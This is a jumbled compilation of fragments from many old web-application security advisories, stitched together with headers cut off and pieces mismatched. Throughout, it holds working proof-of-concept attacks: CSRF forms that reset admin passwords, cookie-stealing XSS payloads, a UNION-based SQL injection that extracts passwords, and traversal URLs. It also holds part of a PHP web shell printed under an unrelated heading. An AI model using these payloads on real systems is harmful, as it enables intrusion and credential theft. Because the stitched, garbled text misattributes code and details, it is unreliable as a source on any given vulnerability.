Status: Fixed by Vendor
Risk level: High
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SiT! Support Incident Tracker, which can be exploited to perform SQL injection, cross-site scripting and cross-site request forgery attacks.
1) Input passed via the "start" GET parameter to /portal/kb.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
</style>
headka;
$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
$page=$page==''||($page!='Created by Cr@zy_King'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
$winda=strpos(strtolower(php_uname()),'wind');
define('format',50);
$pages='<center>###<a href=\''.basename(__FILE__).'\'>Created by Cr@zy_King</a>###</center>'.($winda===false?'id :'.`id`:'');
switch($page)
{
case 'eval':
{
####################
Original Exploit URL: http://bugreport.ir/index.php?/39/exploit
3.1. Everyone can change admin password.
-------------
<form action="http://[URL]/asp/bs_login.asp?btnAction=cSaveAdminPW" method="post">
adminPassword: <input type="text" name="adminPassword" value="" size="30" /><br />
adminPasswordConfirm: <input type="text" name="adminPasswordConfirm" value="" size="30" /><br />
<input type="submit" />
</form>
-------------
The following examples will allow an attacker to enable remote access to the iSpot and ClearSpot 4G, and add their own account to the device. This level of access also provides a device's client-side SSL certificates, which are used to perform device authentication. This could lead to a compromise of ClearWire accounts as well as other personal information.
Add new user:
<form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
1- [Remote Attacker] can log in to the Hosting Controller panel. He can also change all other users' passwords.
2- [User] can copy a file to the Hosting Controller web directory, where it is executed under administrative privilege, so an attacker can execute his commands with administrative privilege; e.g. an attacker can gain a remote desktop on the server by uploading an ASP file through this bug.
3- [Remote Attacker] can create a new user.
4- [Remote Attacker] can change all users' profiles.
5- [User] can see all the database information via a SQL injection.
6- [User] can change his credit amount or increase his discount.
7- [User] can uninstall others' FrontPage extensions.
8- [User] can delete all of the gateway information.
9- [User] can enable or disable the pay type.
10- [User] can see all usernames on the server via "fp2000/NEWSRVR.asp".
The following PoC code is available:
BOF
<form method=post action="http://127.0.0.1/mibew164/operator/ban.php">
<input type=hidden name="address" value='codseq'>
<input type=hidden name="days" value="1">
<input type=hidden name="threadid" value='1"><script>alert(1)</script>'>
<input type=hidden name="comment" value="dasd">
III. ANALYSIS
Summary:
A) "Dump Servlet" information leak
(Affected versions: Any)
B) "FORM Authentication demo" information leak
(Affected versions: Any)
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c02048471
Version: 3
HPSBGN02511 SSRT100022 rev.3 - Certain HP Small Form Factor, Microtower and Workstations PC's with Broadcom Integrated NIC Firmware, Remote Execution of Arbitrary Code
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2010-05-17
Last Updated: 2010-05-17
.top {BACKGROUND-COLOR: "#D0D0D0"}
.firstalt {BACKGROUND-COLOR: "#000000"}
.secondalt {BACKGROUND-COLOR: "#000000"}
</style>
<SCRIPT language=JavaScript>
// Set every checkbox in the form to match the state of the 'chkall' master checkbox
function CheckAll(form) {
for (var i=0;i<form.elements.length;i++) {
var e = form.elements[i];
if (e.name != 'chkall')
e.checked = form.chkall.checked;
}
}
</SCRIPT>
Advisory Information
Advisory ID: NGENUITY-2010-006
Date published: Aug. 7, 2010
Class: Cross-Site Request Forgery (CSRF)
Software Description
filename can be guessed if the attacker knows the database name. The file is also directly downloadable from the website. Example download URI:
http://localhost/torrenttrader109/backups/torrenttrader109-10-06-2009.gz
As a result, an information leak exists: for example, an attacker can fetch admin credentials from the backed-up database.
4. SQL Injection vulnerability in "browse.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c02048471
Version: 2
HPSBGN02511 SSRT100022 rev.2 - HP Small Form Factor or Microtower PC with Broadcom Integrated NIC Firmware, Remote Execution of Arbitrary Code
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2010-03-15
Last Updated: 2010-03-16
Date released: 11/2010
Date reported: 04/2009
by Fatih Kilic
Fraunhofer Institute for Secure Information Technology
fatih.kilic@sit.fraunhofer.de
http://security.fatihkilic.de/advisory/fkilic-sa-2010-ibm-omnifind.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3890
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3891
Information
--------------------
Name : XSS vulnerability in Webmin
Software : All versions prior to and including 1.540 are affected.
Vendor Homepage : http://www.webmin.com
Vulnerability Type : Cross-Site Scripting
Severity : Medium
Researcher : Javier Bassi <javierbassi [at] gmail [dot] com>
An attacker can use a browser to exploit this vulnerability. The following PoC is available:
1.
<form action="http://host/add_story.php" method="post" name="main">
<input type="hidden" name="story_url" value='http://www.example.com/"><script>alert(document.cookie)</script>'>
<input type="hidden" name="Submit" value="Continue">
</form>
<script>
document.main.submit();
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in osCmax, which can be exploited to perform SQL Injection and Cross-Site Scripting (XSS) attacks.
1) Multiple Cross-Site Scripting (XSS) in osCmax: CVE-2012-1664
1.1 Input passed via the "username" POST parameter to /admin/login.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in the user's browser session in the context of the affected website.
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in XOOPS, which can be exploited to perform Cross-Site Scripting (XSS) attacks.
1) Multiple Cross-Site Scripting (XSS) in XOOPS: CVE-2012-0984
1.1 Input passed via the "to_userid" POST parameter to /modules/pm/pmlite.php is not properly sanitised before being returned to the user.
The key part of the advisory for me wasn't VIEWSTATE as much as it was the controls, but this statement you made seemed pretty outrageous (with regard to ASP.NET):
'These vulnerabilities show that unsigned client-side viewstates will ALWAYS result in a vulnerability in the affected products.'
I would disagree - it depends how the software developer implemented use of the VIEWSTATE's content. In ASP.NET, the interesting part here was that you appeared to be controlling an innerhtml property of a Form control through the VIEWSTATE. What your example didn't show, I'm assuming, is some code behind that pulled out the <IndexedString> and set the value in the form's innerHtml property/attribute. That's just dangerous coding, akin to trusting client-side input and no different than acting on client input that came from any method, form input, JSON, etc. Your repro was a bit confusing/misleading without that part. Otherwise, were you saying that some controls inherently populate their properties/attributes from VIEWSTATE content automagically?
There have been past discussions on VIEWSTATE's security:
Scott Mitchell documented tampering VIEWSTATE in a 2004 article:
http://msdn.microsoft.com/en-us/library/ms972976.aspx#viewstate_topic12
Date released: 21.12.2009
Date reported: 28.07.2009
$Revision: 1.1 $
by Alexander Klink
Fraunhofer Institute for Secure Information Technology
alexander.klink@sit.fraunhofer.de
https://www.klink.name/security/aklink-sa-2009-001-sqledger-several-issues.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3580
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3581
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3582
www.sektioneins.de
-= Security Advisory =-
Advisory: Horde Application Framework Horde_Form_Type_image Arbitrary File Overwrite Vulnerability
Release Date: 2009/09/18
Last Modified: 2009/09/18
Author: Stefan Esser [stefan.esser[at]sektioneins.de]
http://www.coresecurity.com/corelabs/
Internet Explorer Security Zone restrictions bypass
1. *Advisory Information*
Title: Internet Explorer Security Zone restrictions bypass
Advisory ID: CORE-2008-0826
Advisory URL: http://www.coresecurity.com/content/ie-security-zone-bypass
Date published: 2009-06-09
Security Advisory
-----------------
FlatPress 0.804-0.812.1 Local File Inclusion to Remote Command Execution
Researcher Information
----------------------
Discovered by: Giuseppe `Zmax` Fuggiano
Website: http://www.giusef.net
Contact: giuseppe(dot)fuggiano(at)gmail(dot)com
GREETZ: hawk, pin3ska, black ant_, qwert666, ua and gacmaan
DIRECTORY TRAVERSAL
http://victim.com/?p=[ONE OF THE EXISTING FILES]-[EXISTING ACTION IN THIS FILE]-
Most actions load templates from the wrong directory and then throw an exception.
example:
http://victim.com/?p=../actions_admin/settings-config
#########################
COOKIE XSS
______________________
[SQL Injection]
- {search.php} -
<form action="http://localhost/yblog/search.php" method="post">
<input type="hidden" name="q" value="' union select 0,1,2,3,usuario,5,6,7,8,9,10,password,12,13,14,15,16 from usuarios/*">
<input type="submit" value="send">
</form>
<form action="http://localhost/yblog/search.php" method="post">
component of WiKID with network client functions) the following vulnerabilities were identified in the sample code:
file sample.php, line 251: PHP_SELF insecure usage leads to XSS
<form action="<?php echo $PHP_SELF ?>" method="POST" >
file sample.php, line 269: PHP_SELF insecure usage leads to XSS
<form action="<?php echo $PHP_SELF ?>" method="POST" >
Product:
Minimo <=.2 and Firefox 2.0.0.6
http://airscanner.com/security/07080103_minimo.2.htm
Platform:
Tested on Minimo .016 and .2 Windows Mobile Pocket PC 2005 and Firefox 2.0.0.6 Windows XP SP2
Requirements:
Mobile device running Windows Mobile Pocket PC or Firefox 2.0.0.6 on XP
@@ -120,7 +122,7 @@
String attributeName = (String)
attributeNamesEnumeration.nextElement();
%>
<tr>
- - <td align="center"><form action="<%= submitUrl %>"><div><input
type="hidden" name="path" value="<%= path %>" /><input type="hidden"
name="action" value="removeSessionAttribute" /><input type="hidden"
name="sessionId" value="<%= currentSessionId %>" /><input type="hidden"
name="attributeName" value="<%= attributeName %>" /><input type="submit"
value="Remove" /></div></form></td>
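Review bot: the replacement `+` line for this hunk is not in the excerpt, so it cannot be confirmed that `<%= path %>`, `<%= currentSessionId %>` and `<%= attributeName %>` are HTML-attribute-escaped in the new form; in the removed `-` line all three are interpolated raw into `value="..."` attributes, and `attributeName` in particular comes straight from `attributeNamesEnumeration.nextElement()` in the unchanged context above, so any quote or angle bracket in a session attribute name would break out of the attribute. Please include the full `+` line (or the escaping helper it uses) so the fix can be reviewed.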
Example exploit:
-------------------------------------------------------------------------------
<html>
<head><title>CruxCMS 3.0.0 Unauthorized Password Reset PoC by waraxe</title></head>
<body><center>
<form action="http://localhost/cruxcms.3.0.0/manager/passwordreset.php" method="post">
<input type="hidden" name="ID" value="1">
<input type="hidden" name="Password" value="waraxe">
<input type="submit" value="Test!">
</form>
</center></body></html>
With these default credentials, internal attackers can modify device configurations to leverage more significant attacks, including redirection of DNS requests, creation of a remote VPN termination point, and modification of NAT entries. These credentials provide access to the web interface for management, as well as a telnet interface that provides shell access to the device. The mso login provides shell as UID 0 (root).
Finding 2: Cross Site Request Forgery (CSRF)
CVE: CVE-2011-0886
The vulnerability exists due to the failure of the "newsdesk/editnews.php", "projects/editproject.php" and "clients/editclient.php" scripts to properly sanitize user-supplied input in the "links", "url_dev" and "url" variables. Successful exploitation of these vulnerabilities could result in a compromise of the application, theft of cookie-based authentication credentials, or disclosure or modification of sensitive data.
An attacker can use a browser to exploit this vulnerability. The following PoC is available:
1.
<form action="http://host/newsdesk/editnews.php?id=NEWSID&action=update" method="post">
<input type="hidden" name="author" value="1">
<input type="hidden" name="title" value="news2">
<input type="hidden" name="related" value="g">
<input type="hidden" name="content" value="hello2">
<input type="hidden" name="links" value='2"><script>alert(document.cookie)</script>'>